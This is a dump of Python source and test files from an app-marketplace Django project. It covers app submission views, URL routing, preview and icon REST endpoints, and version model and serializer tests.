        eq_(data['detail'], 'Not found')
    def test_not_mine(self):
        self.app.authors.clear()
        res = self.client.post(self.list_url, data=json.dumps(self.good))
        eq_(res.status_code, 403)
    def test_position_missing(self):
        data = {'file': {'data': self.file, 'type': 'image/jpg'}}
        res = self.client.post(self.list_url, data=json.dumps(data))
        eq_(res.status_code, 400)
        eq_(self.get_error(res)['position'], ['This field is required.'])
    def test_preview_missing(self):
        res = self.client.post(self.list_url, data=json.dumps({}))
        eq_(res.status_code, 400)
        eq_(self.get_error(res)['position'], ['This field is required.'])
    def create(self):
        # Create one preview and point get_url at its detail resource.
        self.client.post(self.list_url, data=json.dumps(self.good))
        self.preview = self.app.previews.all()[0]
        self.get_url = reverse('app-preview-detail',
                               kwargs={'pk': self.preview.pk})
    def test_delete(self):
        self.create()
        res = self.client.delete(self.get_url)
        eq_(res.status_code, 204)
        eq_(self.app.previews.count(), 0)
    def test_delete_not_mine(self):
        self.create()
        self.app.authors.clear()
        res = self.client.delete(self.get_url)
        eq_(res.status_code, 403)
    def test_delete_not_there(self):
        self.get_url = reverse('app-preview-detail',
                               kwargs={'pk': 123123123})
        res = self.client.delete(self.get_url)
        eq_(res.status_code, 404)
    def test_get(self):
        self.create()
        res = self.client.get(self.get_url)
        eq_(res.status_code, 200)
    def test_get_not_mine(self):
        self.create()
        self.app.authors.clear()
        res = self.client.get(self.get_url)
        eq_(res.status_code, 403)
    def test_get_not_there(self):
        self.get_url = reverse('app-preview-detail',
                               kwargs={'pk': 123123123})
        res = self.client.get(self.get_url)
        eq_(res.status_code, 404)
class TestIconUpdate(RestOAuth, amo.tests.AMOPaths):
    """REST API tests for replacing an app's icon via PUT."""
    fixtures = fixture('user_2519', 'webapp_337141')
    def setUp(self):
        super(TestIconUpdate, self).setUp()
        self.app = Webapp.objects.get(pk=337141)
        self.user = UserProfile.objects.get(pk=2519)
        AddonUser.objects.create(user=self.user, addon=self.app)
        # Read the image in binary mode and close the handle; the original
        # `open(...).read()` leaked the file object.
        with open(self.mozball_image(), 'rb') as fh:
            self.file = base64.b64encode(fh.read())
        self.url = reverse('app-icon', kwargs={'pk': self.app.pk})
        self.data = {'file': {'data': self.file, 'type': 'image/png'}}
    def images_are_equal(self, image_file_1, image_file_2):
        # Pixel-wise comparison: identical images diff to an empty bbox.
        im1 = Image.open(image_file_1)
        im2 = Image.open(image_file_2)
        return ImageChops.difference(im1, im2).getbbox() is None
    def test_has_cors(self):
        self.assertCORS(self.client.post(self.url), 'put')
    def test_put_icon_success(self):
        res = self.client.put(self.url, data=json.dumps(self.data))
        eq_(res.status_code, 200)
    def test_correct_new_icon(self):
        # The PUT icon should be resized/stored as the 128px variant.
        self.client.put(self.url, data=json.dumps(self.data))
        icon_dir = self.app.get_icon_dir()
        icon_path = os.path.join(icon_dir, '%s-128.png' % str(self.app.id))
        eq_(self.images_are_equal(self.mozball_image(), icon_path), True)
    def test_invalid_owner_permissions(self):
        self.app.authors.clear()
        res = self.client.put(self.url, data=json.dumps(self.data))
        eq_(res.status_code, 403)
    def test_invalid_icon_type(self):
        data = {'file': {'data': self.file, 'type': 'image/gif'}}
        res = self.client.put(self.url, data=json.dumps(data))
        eq_(res.status_code, 400)
        eq_(json.loads(res.content)['file'][0],
            u'Icons must be either PNG or JPG.')
########NEW FILE########
__FILENAME__ = urls
from django.conf.urls import include, patterns, url
from django.shortcuts import redirect
from lib.misc.urlconf_decorator import decorate
import amo
from amo.decorators import write
from . import views
# These URLs start with /developers/submit/app/<app_slug>/.
# The views referenced here live in mkt/submit/views.py.
submit_apps_patterns = patterns('',
    url('^details/%s$' % amo.APP_SLUG, views.details,
        name='submit.app.details'),
    url('^done/%s$' % amo.APP_SLUG, views.done, name='submit.app.done'),
    url('^resume/%s$' % amo.APP_SLUG, views.resume, name='submit.app.resume'),
)
# Decorate all the views as @write so as to bypass cache.
urlpatterns = decorate(write, patterns('',
    # Legacy redirects for app submission.
    ('^app', lambda r: redirect('submit.app')),
    # ^ So we can avoid an additional redirect below.
    ('^app/.*', lambda r: redirect(r.path.replace('/developers/app',
                                                  '/developers', 1))),
    ('^manifest$', lambda r: redirect('submit.app', permanent=True)),
    # App submission.
    url('^$', views.submit, name='submit.app'),
    url('^terms$', views.terms, name='submit.app.terms'),
    ('', include(submit_apps_patterns)),
))
########NEW FILE########
__FILENAME__ = views
from django.core.exceptions import ObjectDoesNotExist
from django.core.urlresolvers import reverse
from django.db import transaction
from django.shortcuts import redirect, render
from django.utils.translation.trans_real import to_language
import commonware.log
import waffle
from rest_framework import mixins
from rest_framework.exceptions import MethodNotAllowed
from rest_framework.permissions import AllowAny
from rest_framework.response import Response
from rest_framework.status import (HTTP_201_CREATED, HTTP_202_ACCEPTED,
HTTP_400_BAD_REQUEST)
from rest_framework.viewsets import GenericViewSet
import amo
from addons.models import Addon, AddonUser, Preview
from amo.decorators import login_required, write
from .decorators import read_dev_agreement_required, submit_step
from files.models import FileUpload, Platform
from lib.metrics import record_action
from mkt.api.authentication import (RestAnonymousAuthentication,
RestOAuthAuthentication,
RestSharedSecretAuthentication)
from mkt.api.authorization import AllowAppOwner, AllowRelatedAppOwner
from mkt.api.base import CORSMixin, MarketplaceView
from mkt.api.forms import NewPackagedForm, PreviewJSONForm
from mkt.constants import DEVICE_LOOKUP
from mkt.developers import tasks
from mkt.developers.decorators import dev_required
from mkt.developers.forms import (AppFormMedia, CategoryForm, NewManifestForm,
PreviewForm, PreviewFormSet)
from mkt.submit.forms import AppDetailsBasicForm
from mkt.submit.models import AppSubmissionChecklist
from mkt.submit.serializers import (AppStatusSerializer, FileUploadSerializer,
PreviewSerializer)
from mkt.webapps.models import Webapp
from users.models import UserProfile
from . import forms
from .decorators import read_dev_agreement_required, submit_step
log = commonware.log.getLogger('z.submit')
def submit(request):
    """Entry point for app submission: route the user to the right step.

    Anonymous users get the overlay terms/login page; authenticated users
    who have not yet accepted the developer agreement are sent to the
    terms step; everyone else proceeds to the manifest step.
    """
    if request.user.is_authenticated():
        profile = UserProfile.objects.get(pk=request.user.id)
        if profile.read_dev_agreement:
            return manifest(request)
        return redirect('submit.app.terms')
    return proceed(request)
def proceed(request):
    """
    This is a fake "Terms" view that we overlay the login.
    We link here from the Developer Hub landing page.
    """
    if request.user.is_authenticated():
        return submit(request)
    form = forms.DevAgreementForm({'read_dev_agreement': True},
                                  instance=None, request=request)
    context = {'step': 'terms', 'agreement_form': form, 'proceed': True}
    return render(request, 'submit/terms.html', context)
@login_required
@submit_step('terms')
def terms(request):
    """Terms step: show and accept the developer agreement.

    Note the form default: with no POST data it is seeded with
    ``read_dev_agreement=True`` so the checkbox renders pre-checked.
    """
    # If dev has already agreed, continue to next step.
    if (getattr(request, 'amo_user', None) and
            request.amo_user.read_dev_agreement):
        return manifest(request)
    agreement_form = forms.DevAgreementForm(
        request.POST or {'read_dev_agreement': True},
        instance=request.amo_user,
        request=request)
    if request.POST and agreement_form.is_valid():
        agreement_form.save()
        return redirect('submit.app')
    return render(request, 'submit/terms.html',
                  {'step': 'terms', 'agreement_form': agreement_form})
@login_required
@read_dev_agreement_required
@submit_step('manifest')
def manifest(request):
    """Manifest/upload step: create the Addon from a validated upload.

    On a valid POST, creates the Addon, its device types, premium type,
    icon flag, ownership, submission checklist and feature profile inside
    one transaction, then redirects to the details step.
    """
    form = forms.NewWebappForm(request.POST or None, request=request)
    features_form = forms.AppFeaturesForm(request.POST or None)
    features_form_valid = features_form.is_valid()
    if (request.method == 'POST' and form.is_valid()
            and features_form_valid):
        with transaction.commit_on_success():
            addon = Addon.from_upload(
                form.cleaned_data['upload'],
                [Platform.objects.get(id=amo.PLATFORM_ALL.id)],
                is_packaged=form.is_packaged())
            # Set the device type.
            for device in form.get_devices():
                addon.addondevicetype_set.get_or_create(
                    device_type=device.id)
            # Set the premium type, only bother if it's not free.
            premium = form.get_paid()
            if premium:
                addon.update(premium_type=premium)
            if addon.has_icon_in_manifest():
                # Fetch the icon, do polling.
                addon.update(icon_type='image/png')
            else:
                # In this case there is no need to do any polling.
                addon.update(icon_type='')
            AddonUser(addon=addon, user=request.amo_user).save()
            # Checking it once. Checking it twice.
            AppSubmissionChecklist.objects.create(addon=addon, terms=True,
                                                  manifest=True,
                                                  details=False)
            # Create feature profile.
            addon.current_version.features.update(**features_form.cleaned_data)
        # Call task outside of `commit_on_success` to avoid it running before
        # the transaction is committed and not finding the app.
        tasks.fetch_icon.delay(addon)
        return redirect('submit.app.details', addon.app_slug)
    return render(request, 'submit/manifest.html',
                  {'step': 'manifest', 'features_form': features_form,
                   'form': form, 'DEVICE_LOOKUP': DEVICE_LOOKUP})
@dev_required
@submit_step('details')
def details(request, addon_id, addon):
    """Details step: collect listing info, categories, icon and previews.

    On a valid POST, saves all four forms, backfills device types for
    legacy apps, marks the checklist, sets the app's review/publish
    status (free vs. paid, IARC on/off) and redirects to the done page.
    """
    # Name, Slug, Description, Privacy Policy, Homepage URL, Support URL,
    # Support Email.
    form_basic = AppDetailsBasicForm(request.POST or None, instance=addon,
                                     request=request)
    form_cats = CategoryForm(request.POST or None, product=addon,
                             request=request)
    form_icon = AppFormMedia(request.POST or None, request.FILES or None,
                             instance=addon, request=request)
    form_previews = PreviewFormSet(request.POST or None, prefix='files',
                                   queryset=addon.get_previews())

    # For empty webapp-locale (or no-locale) fields that have
    # form-locale values, duplicate them to satisfy the requirement.
    form_locale = request.COOKIES.get('current_locale', '')
    app_locale = to_language(addon.default_locale)
    for name, value in request.POST.items():
        if value:
            if name.endswith(form_locale):
                basename = name[:-len(form_locale)]
            else:
                basename = name + '_'
            othername = basename + app_locale
            if not request.POST.get(othername, None):
                request.POST[othername] = value
    forms = {
        'form_basic': form_basic,
        'form_cats': form_cats,
        'form_icon': form_icon,
        'form_previews': form_previews,
    }
    if request.POST and all(f.is_valid() for f in forms.itervalues()):
        addon = form_basic.save(addon)
        form_cats.save()
        form_icon.save(addon)
        for preview in form_previews.forms:
            preview.save(addon)

        # If this is an incomplete app from the legacy submission flow, it may
        # not have device types set yet - so assume it works everywhere.
        if not addon.device_types:
            for device in amo.DEVICE_TYPES:
                addon.addondevicetype_set.create(device_type=device)

        AppSubmissionChecklist.objects.get(addon=addon).update(details=True)

        # `make_public` if the developer doesn't want the app published
        # immediately upon review.
        make_public = (amo.PUBLIC_IMMEDIATELY
                       if form_basic.cleaned_data.get('publish')
                       else amo.PUBLIC_WAIT)

        if addon.premium_type == amo.ADDON_FREE:
            if waffle.switch_is_active('iarc'):
                # Free apps get STATUS_NULL until content ratings has been
                # entered.
                # TODO: set to STATUS_PENDING once app gets an IARC rating.
                addon.update(make_public=make_public)
            else:
                addon.update(status=amo.STATUS_PENDING,
                             make_public=make_public)
        else:
            # Paid apps get STATUS_NULL until payment information and content
            # ratings has been entered.
            addon.update(status=amo.STATUS_NULL, make_public=make_public,
                         highest_status=amo.STATUS_PENDING)

        record_action('app-submitted', request, {'app-id': addon.pk})

        return redirect('submit.app.done', addon.app_slug)

    ctx = {
        'step': 'details',
        'addon': addon,
    }
    ctx.update(forms)
    return render(request, 'submit/details.html', ctx)
@dev_required
def done(request, addon_id, addon):
    """Final submission page; the IARC switch picks which template."""
    # No submit step forced on this page, we don't really care.
    iarc = waffle.switch_is_active('iarc')
    template = 'submit/next_steps.html' if iarc else 'submit/done.html'
    step = 'next_steps' if iarc else 'done'
    return render(request, template, {'step': step, 'addon': addon})
@dev_required
def resume(request, addon_id, addon):
    """Pick up an interrupted submission at its next incomplete step."""
    try:
        step = addon.appsubmissionchecklist.get_next()
    except ObjectDoesNotExist:
        # If it didn't go through the app submission checklist, don't
        # die. This will be useful for creating apps with an API later.
        step = None
    return _resume(addon, step)
def _resume(addon, step):
    """Redirect to the view for `step`, or to the edit page if done."""
    if not step:
        return redirect(addon.get_dev_url('edit'))
    url_name = 'submit.app.%s' % step
    if step in ('terms', 'manifest'):
        # These steps are app-agnostic: their URLs take no slug.
        return redirect(url_name)
    return redirect(reverse(url_name, args=[addon.app_slug]))
class ValidationViewSet(CORSMixin, mixins.CreateModelMixin,
                        mixins.RetrieveModelMixin, GenericViewSet):
    """Create and poll app validation jobs (hosted and packaged)."""
    cors_allowed_methods = ['get', 'post']
    authentication_classes = [RestOAuthAuthentication,
                              RestSharedSecretAuthentication,
                              RestAnonymousAuthentication]
    permission_classes = [AllowAny]
    model = FileUpload
    serializer_class = FileUploadSerializer

    @write
    def create(self, request, *args, **kwargs):
        """
        Custom create method allowing us to re-use form logic and distinguish
        packaged app from hosted apps, applying delays to the validation task
        if necessary.

        Doesn't rely on any serializer, just forms.
        """
        data = self.request.DATA
        # A packaged-app request carries an 'upload'; hosted apps only
        # submit a manifest URL.
        packaged = 'upload' in data
        form = (NewPackagedForm(data) if packaged
                else NewManifestForm(data))

        if not form.is_valid():
            return Response(form.errors, status=HTTP_400_BAD_REQUEST)

        if not packaged:
            upload = FileUpload.objects.create(
                user=getattr(request, 'amo_user', None))
            # The hosted app validator is pretty fast.
            # NOTE: deliberately called synchronously (no .delay) so the
            # result may be ready for the response below.
            tasks.fetch_manifest(form.cleaned_data['manifest'], upload.pk)
        else:
            upload = form.file_upload
            # The packaged app validator is much heavier.
            tasks.validator.delay(upload.pk)

        log.info('Validation created: %s' % upload.pk)
        self.kwargs = {'pk': upload.pk}
        # Re-fetch the object, fetch_manifest() might have altered it.
        upload = self.get_object()
        serializer = self.get_serializer(upload)
        # 201 when validation already finished, 202 when still running.
        status = HTTP_201_CREATED if upload.processed else HTTP_202_ACCEPTED
        return Response(serializer.data, status=status)
class StatusViewSet(mixins.RetrieveModelMixin, mixins.UpdateModelMixin,
                    GenericViewSet):
    """Read and partially update (PATCH-only) an app's status."""
    queryset = Webapp.objects.all()
    authentication_classes = [RestOAuthAuthentication,
                              RestSharedSecretAuthentication]
    permission_classes = [AllowAppOwner]
    serializer_class = AppStatusSerializer

    def update(self, request, *args, **kwargs):
        """Reject PUT: only PATCH is accepted for this endpoint."""
        if request.method != 'PUT':
            return super(StatusViewSet, self).update(request, *args,
                                                     **kwargs)
        raise MethodNotAllowed('PUT')
class PreviewViewSet(CORSMixin, MarketplaceView, mixins.RetrieveModelMixin,
                     mixins.DestroyModelMixin, GenericViewSet):
    """Retrieve, create (via AppViewSet's @action) and delete previews."""
    authentication_classes = [RestOAuthAuthentication,
                              RestSharedSecretAuthentication]
    permission_classes = [AllowRelatedAppOwner]
    queryset = Preview.objects.all()
    cors_allowed_methods = ['get', 'post', 'delete']
    serializer_class = PreviewSerializer

    def _create(self, request, *args, **kwargs):
        """
        Handle creation. This is directly called by the @action on AppViewSet,
        allowing the URL to depend on the app id. AppViewSet passes this method
        a Webapp instance in kwargs['app'] (optionally raising a 404 if the
        app in the URL doesn't exist, or a 403 if the app belongs to someone
        else).

        Note: this method is called '_create' and not 'create' because DRF
        would automatically make an 'app-preview-list' url name if this
        method was called 'create', which we don't want - the app-preview-list
        url name needs to be generated by AppViewSet's @action to include the
        app pk.
        """
        app = kwargs['app']
        data_form = PreviewJSONForm(request.DATA)
        if not data_form.is_valid():
            return Response(data_form.errors, status=HTTP_400_BAD_REQUEST)

        form = PreviewForm(data_form.cleaned_data)
        if not form.is_valid():
            # Bug fix: this previously returned data_form.errors, which is
            # empty here since data_form already validated - return the
            # errors of the form that actually failed.
            return Response(form.errors, status=HTTP_400_BAD_REQUEST)

        form.save(app)
        log.info('Preview created: %s' % form.instance)
        serializer = self.get_serializer(form.instance)
        return Response(serializer.data, status=HTTP_201_CREATED)
########NEW FILE########
__FILENAME__ = urls
# -*- coding: utf-8 -*-
from django.conf import settings
from django.conf.urls import include, patterns, url
from django.contrib import admin
from django.shortcuts import redirect
from django.views.decorators.cache import cache_page
from django.views.i18n import javascript_catalog
import amo
from apps.users.views import logout
from mkt.account.urls import user_patterns
from mkt.api import oauth
from mkt.detail.views import manifest as mini_manifest
from mkt.developers.views import login
from mkt.operators.urls import url_patterns as operator_patterns
from mkt.purchase.urls import webpay_services_patterns
from mkt.reviewers.urls import url_patterns as reviewer_url_patterns
admin.autodiscover()

# Custom error handlers used site-wide.
handler403 = 'mkt.site.views.handler403'
handler404 = 'mkt.site.views.handler404'
handler500 = 'mkt.site.views.handler500'

urlpatterns = patterns('',
    # Non-commonplace app pages
    ('^app/%s/' % amo.APP_SLUG, include('mkt.detail.urls')),
    url('^app/%s/manifest.webapp$' % amo.ADDON_UUID, mini_manifest,
        name='detail.manifest'),

    # Dev Ecosystem
    ('^developers/', include('mkt.ecosystem.urls')),
    ('^ecosystem/', lambda r: redirect('ecosystem.landing', permanent=True)),

    # Files
    ('^files/', include('mkt.files.urls')),

    # Replace the "old" Developer Hub with the "new" Marketplace one.
    ('^developers/', include('mkt.developers.urls')),

    # Submission.
    ('^developers/submit/', include('mkt.submit.urls')),

    # Users.
    ('^users/', include(user_patterns)),

    # Reviewer tools.
    ('^reviewers/', include(reviewer_url_patterns)),

    # Account lookup.
    ('^lookup/', include('mkt.lookup.urls')),

    # Bootstrapped operator dashboard.
    ('^operators/', include(operator_patterns)),

    # Javascript translations (cached for a year).
    url('^jsi18n.js$', cache_page(60 * 60 * 24 * 365)(javascript_catalog),
        {'domain': 'javascript', 'packages': ['zamboni']}, name='jsi18n'),

    # webpay / nav.pay() services.
    ('^services/webpay/', include(webpay_services_patterns)),

    # AMO admin (not django admin).
    ('^admin/', include('zadmin.urls')),
    # AMO Marketplace admin (not django admin).
    ('^admin/', include('mkt.zadmin.urls')),

    # Accept extra junk at the end for a cache-busting build id.
    url('^addons/buttons.js(?:/.+)?$', 'addons.buttons.js'),

    # Developer Registration Login.
    url('^login$', login, name='users.login'),
    url('^logout$', logout, name='users.logout'),

    # OAuth endpoints for API consumers.
    url('^oauth/register/$', oauth.access_request,
        name='mkt.developers.oauth_access_request'),
    url('^oauth/token/$', oauth.token_request,
        name='mkt.developers.oauth_token_request'),
    url('^oauth/authorize/$', oauth.authorize,
        name='mkt.developers.oauth_authorize'),

    url('^api/', include('mkt.api.urls')),

    url('^downloads/', include('mkt.downloads.urls')),

    # Try and keep urls without a prefix at the bottom of the list for
    # minor performance reasons.

    # Misc pages.
    ('', include('mkt.commonplace.urls')),
    ('', include('mkt.site.urls')),

    # Services.
    ('', include('amo.urls')),
)

if settings.TEMPLATE_DEBUG:
    # Remove leading and trailing slashes so the regex matches.
    media_url = settings.MEDIA_URL.lstrip('/').rstrip('/')
    urlpatterns += patterns('',
        (r'^%s/(?P<path>.*)$' % media_url, 'django.views.static.serve',
         {'document_root': settings.MEDIA_ROOT}),
    )

if settings.SERVE_TMP_PATH and settings.DEBUG:
    # Serves any URL like /tmp/* from your local ./tmp/ dir
    urlpatterns += patterns('',
        (r'^tmp/(?P<path>.*)$', 'django.views.static.serve',
         {'document_root': settings.TMP_PATH}),
    )
########NEW FILE########
__FILENAME__ = serializers
from rest_framework import serializers
from versions.models import Version
from mkt.features.serializers import AppFeaturesSerializer
class SimpleVersionSerializer(serializers.ModelSerializer):
    """Minimal Version representation: version string plus API URL."""
    resource_uri = serializers.HyperlinkedIdentityField(
        view_name='version-detail')

    class Meta:
        model = Version
        fields = ('version', 'resource_uri')
class VersionSerializer(serializers.ModelSerializer):
    """Full Version representation with renamed and derived fields."""
    addon = serializers.HyperlinkedRelatedField(view_name='app-detail',
                                                read_only=True)

    class Meta:
        model = Version
        fields = ('id', 'addon', '_developer_name', 'releasenotes', 'version')
        depth = 0
        # Map internal model field names to the friendlier names exposed
        # by the API; applied in to_native() below.
        field_rename = {
            '_developer_name': 'developer_name',
            'releasenotes': 'release_notes',
            'addon': 'app'
        }

    def to_native(self, obj):
        """Serialize `obj`, adding derived keys and renaming fields."""
        native = super(VersionSerializer, self).to_native(obj)

        # Add non-field data to the response.
        native.update({
            'features': AppFeaturesSerializer().to_native(obj.features),
            'is_current_version': obj.addon.current_version == obj,
            'releasenotes': (unicode(obj.releasenotes) if obj.releasenotes else
                             None),
        })

        # Remap fields to friendlier, more backwards-compatible names.
        for old, new in self.Meta.field_rename.items():
            native[new] = native[old]
            del native[old]

        return native
########NEW FILE########
__FILENAME__ = test_models
# -*- coding: utf-8 -*-
import os.path
import mock
import path
from nose import SkipTest
from nose.tools import eq_
from django.conf import settings
import amo
import amo.tests
from addons.models import Addon
from amo.tests import addon_factory
from files.models import File, Platform
from versions.compare import (dict_from_int, MAXVERSION, version_dict,
version_int)
from versions.models import Version
from mkt.files.tests.test_models import UploadTest as BaseUploadTest
from mkt.site.fixtures import fixture
def test_version_int():
    """version_int() normalizes odd/overflowing version strings."""
    cases = [
        ('3.5.0a1pre2', 3050000001002),
        ('', 200100),
        ('0', 200100),
        ('*', 99000000200100),
        (MAXVERSION, MAXVERSION),
        (MAXVERSION + 1, MAXVERSION),
        ('9999999', MAXVERSION),
    ]
    for raw, expected in cases:
        eq_(version_int(raw), expected)
def test_version_int_compare():
    """A trailing wildcard maps to .99 and sorts above concrete versions."""
    eq_(version_int('3.6.*'), version_int('3.6.99'))
    assert version_int('3.6.*') > version_int('3.6.8')
def test_version_asterix_compare():
    """Bare and positional '*' wildcards compare as maximal values."""
    eq_(version_int('*'), version_int('99'))
    assert version_int('98.*') < version_int('*')
    eq_(version_int('5.*'), version_int('5.99'))
    assert version_int('5.*') > version_int('5.0.*')
def test_version_dict():
    """version_dict() splits a version string into its component fields."""
    eq_(version_dict('5.0'),
        {'major': 5,
         'minor1': 0,
         'minor2': None,
         'minor3': None,
         'alpha': None,
         'alpha_ver': None,
         'pre': None,
         'pre_ver': None})
def test_version_int_unicode():
    """Unparseable unicode versions fall back to the default int."""
    eq_(version_int(u'\u2322 ugh stephend'), 200100)
def test_dict_from_int():
    """dict_from_int() unpacks every field encoded in a version int."""
    expected = {'major': 3, 'minor1': 5, 'minor2': 0, 'minor3': 0,
                'alpha': 'a', 'alpha_ver': 1, 'pre': 'pre', 'pre_ver': 2}
    d = dict_from_int(3050000001002)
    for key, value in expected.items():
        eq_(d[key], value)
class TestVersion(BaseUploadTest, amo.tests.TestCase):
    """Tests for the Version model as used by the Marketplace."""
    fixtures = fixture('webapp_337141', 'platform_all')

    def setUp(self):
        # NOTE(review): path.path.rename is saved but never restored in a
        # tearDown - presumably leftover from an older test; confirm.
        self._rename = path.path.rename
        self.version = Version.objects.latest('id')

    def test_developer_name(self):
        """developer_name reflects the private _developer_name field."""
        version = Version.objects.latest('id')
        version._developer_name = u'M€lâ'
        eq_(version.developer_name, u'M€lâ')
        eq_(Version(_developer_name=u'M€lâ').developer_name, u'M€lâ')

    @mock.patch('files.utils.parse_addon')
    def test_developer_name_from_upload(self, parse_addon):
        """from_upload() stores the developer name parsed from the package."""
        parse_addon.return_value = {
            'version': '42.0',
            'developer_name': u'Mýself'
        }
        addon = Addon.objects.get(pk=337141)
        # Note: we need a valid FileUpload instance, but in the end we are not
        # using its contents since we are mocking parse_addon().
        path = os.path.join(settings.ROOT, 'mkt', 'developers', 'tests',
                            'addons', 'mozball.webapp')
        upload = self.get_upload(abspath=path, is_webapp=True)
        platform = Platform.objects.get(pk=amo.PLATFORM_ALL.id)
        version = Version.from_upload(upload, addon, [platform])
        eq_(version.version, '42.0')
        eq_(version.developer_name, u'Mýself')

    @mock.patch('files.utils.parse_addon')
    def test_long_developer_name_from_upload(self, parse_addon):
        """Developer names longer than 255 chars are truncated on save."""
        truncated_developer_name = u'ý' * 255
        long_developer_name = truncated_developer_name + u'àààà'
        parse_addon.return_value = {
            'version': '42.1',
            'developer_name': long_developer_name
        }
        addon = Addon.objects.get(pk=337141)
        # Note: we need a valid FileUpload instance, but in the end we are not
        # using its contents since we are mocking parse_addon().
        path = os.path.join(settings.ROOT, 'mkt', 'developers', 'tests',
                            'addons', 'mozball.webapp')
        upload = self.get_upload(abspath=path, is_webapp=True)
        platform = Platform.objects.get(pk=amo.PLATFORM_ALL.id)
        version = Version.from_upload(upload, addon, [platform])
        eq_(version.version, '42.1')
        eq_(version.developer_name, truncated_developer_name)

    def test_is_privileged_hosted_app(self):
        """Hosted apps are never privileged."""
        addon = Addon.objects.get(pk=337141)
        eq_(addon.current_version.is_privileged, False)

    @mock.patch('mkt.webapps.models.Webapp.get_manifest_json')
    def test_is_privileged_app(self, get_manifest_json):
        """Packaged apps with type 'privileged' in the manifest are flagged."""
        get_manifest_json.return_value = {
            'type': 'privileged'
        }
        addon = Addon.objects.get(pk=337141)
        addon.update(is_packaged=True)
        eq_(addon.current_version.is_privileged, True)

    @mock.patch('mkt.webapps.models.Webapp.get_manifest_json')
    def test_is_privileged_non_privileged_app(self, get_manifest_json):
        """Packaged apps without a manifest type are not privileged."""
        get_manifest_json.return_value = {
        }
        addon = Addon.objects.get(pk=337141)
        addon.update(is_packaged=True)
        eq_(addon.current_version.is_privileged, False)

    def test_delete(self):
        """Deleting a version soft-deletes it and disables its files."""
        version = Version.objects.all()[0]
        eq_(Version.objects.count(), 1)
        version.delete()
        eq_(Version.objects.count(), 0)
        eq_(Version.with_deleted.count(), 1)
        # Ensure deleted version's files get disabled.
        eq_(version.all_files[0].status, amo.STATUS_DISABLED)

    def test_compatible_apps(self):
        # TODO: Do apps have compatible_apps?
        raise SkipTest('Figure out if we need `compatible_apps` or remove.')
        assert amo.FIREFOX in self.version.compatible_apps, (
            'Missing compatible apps: %s' % self.version.compatible_apps)

    def test_supported_platforms(self):
        assert amo.PLATFORM_ALL in self.version.supported_platforms, (
            'Missing PLATFORM_ALL')

    def test_major_minor(self):
        """Check that major/minor/alpha is getting set."""
        v = Version(version='3.0.12b2')
        eq_(v.major, 3)
        eq_(v.minor1, 0)
        eq_(v.minor2, 12)
        eq_(v.minor3, None)
        eq_(v.alpha, 'b')
        eq_(v.alpha_ver, 2)

        v = Version(version='3.6.1apre2+')
        eq_(v.major, 3)
        eq_(v.minor1, 6)
        eq_(v.minor2, 1)
        eq_(v.alpha, 'a')
        eq_(v.pre, 'pre')
        eq_(v.pre_ver, 2)

        v = Version(version='')
        eq_(v.major, None)
        eq_(v.minor1, None)
        eq_(v.minor2, None)
        eq_(v.minor3, None)

    def test_has_files(self):
        assert self.version.has_files, 'Version with files not recognized.'

        self.version.files.all().delete()
        self.version = Version.objects.latest('id')
        assert not self.version.has_files, (
            'Version without files not recognized.')

    def _get_version(self, status):
        # Build a throwaway Version whose single (mocked) file has `status`.
        v = Version()
        v.all_files = [mock.Mock()]
        v.all_files[0].status = status
        return v

    @mock.patch('versions.models.storage')
    def test_version_delete(self, storage_mock):
        """Deleting a hosted version never touches the signed-file storage."""
        self.version.delete()
        addon = Addon.objects.get(pk=337141)
        assert addon

        assert not Version.objects.filter(addon=addon).exists()
        assert Version.with_deleted.filter(addon=addon).exists()
        assert not storage_mock.delete.called

    @mock.patch('versions.models.storage')
    def test_packaged_version_delete(self, storage_mock):
        """Deleting a packaged version removes its file from storage."""
        addon = Addon.objects.get(pk=337141)
        addon.update(is_packaged=True)
        version = addon.current_version
        version.delete()

        assert not Version.objects.filter(addon=addon).exists()
        assert Version.with_deleted.filter(addon=addon).exists()
        assert storage_mock.delete.called

    def test_version_delete_files(self):
        eq_(self.version.files.all()[0].status, amo.STATUS_PUBLIC)
        self.version.delete()
        eq_(self.version.files.all()[0].status, amo.STATUS_DISABLED)

    @mock.patch('files.models.File.hide_disabled_file')
    def test_new_version_disable_old_unreviewed(self, hide_mock):
        """disable_old_files() disables pending files, not public ones."""
        addon = Addon.objects.get(pk=337141)
        # The status doesn't change for public files.
        qs = File.objects.filter(version=addon.current_version)
        eq_(qs.all()[0].status, amo.STATUS_PUBLIC)
        Version.objects.create(addon=addon)
        eq_(qs.all()[0].status, amo.STATUS_PUBLIC)
        assert not hide_mock.called

        qs.update(status=amo.STATUS_PENDING)
        version = Version.objects.create(addon=addon)
        version.disable_old_files()
        eq_(qs.all()[0].status, amo.STATUS_DISABLED)
        assert hide_mock.called

    def test_large_version_int(self):
        # This version will fail to be written to the version_int
        # table because the resulting int is bigger than mysql bigint.
        version = Version(addon=Addon.objects.get(pk=337141))
        version.version = '9223372036854775807'
        version.save()
        eq_(version.version_int, None)

    def _reset_version(self, version):
        # Restore a version to a known public, not-deleted state.
        version.all_files[0].status = amo.STATUS_PUBLIC
        version.deleted = False

    def test_version_is_public(self):
        addon = Addon.objects.get(id=337141)
        version = amo.tests.version_factory(addon=addon)

        # Base test. Everything is in order, the version should be public.
        eq_(version.is_public(), True)

        # Non-public file.
        self._reset_version(version)
        version.all_files[0].status = amo.STATUS_DISABLED
        eq_(version.is_public(), False)

        # Deleted version.
        self._reset_version(version)
        version.deleted = True
        eq_(version.is_public(), False)

        # Non-public addon.
        self._reset_version(version)
        with mock.patch('addons.models.Addon.is_public') as is_addon_public:
            is_addon_public.return_value = False
            eq_(version.is_public(), False)

    def test_app_feature_creation_app(self):
        app = Addon.objects.create(type=amo.ADDON_WEBAPP)
        ver = Version.objects.create(addon=app)
        assert ver.features, 'AppFeatures was not created with version.'
class TestApplicationsVersions(amo.tests.TestCase):
    """Tests for the unicode representation of a version's app range."""

    def setUp(self):
        self.version_kw = dict(min_app_version='5.0', max_app_version='6.*')

    def test_repr_when_compatible(self):
        addon = addon_factory(version_kw=self.version_kw)
        version = addon.current_version
        eq_(version.apps.all()[0].__unicode__(), 'Firefox 5.0 - 6.*')

    def test_repr_when_unicode(self):
        # Non-ASCII min/max versions must render without raising.
        addon = addon_factory(version_kw=dict(min_app_version=u'ك',
                                              max_app_version=u'ك'))
        version = addon.current_version
        eq_(unicode(version.apps.all()[0]), u'Firefox ك - ك')
########NEW FILE########
__FILENAME__ = test_serializers
from django.core.urlresolvers import reverse
from nose.tools import eq_, ok_
from test_utils import RequestFactory
from amo.tests import app_factory, TestCase
from versions.models import Version
from mkt.versions.serializers import VersionSerializer
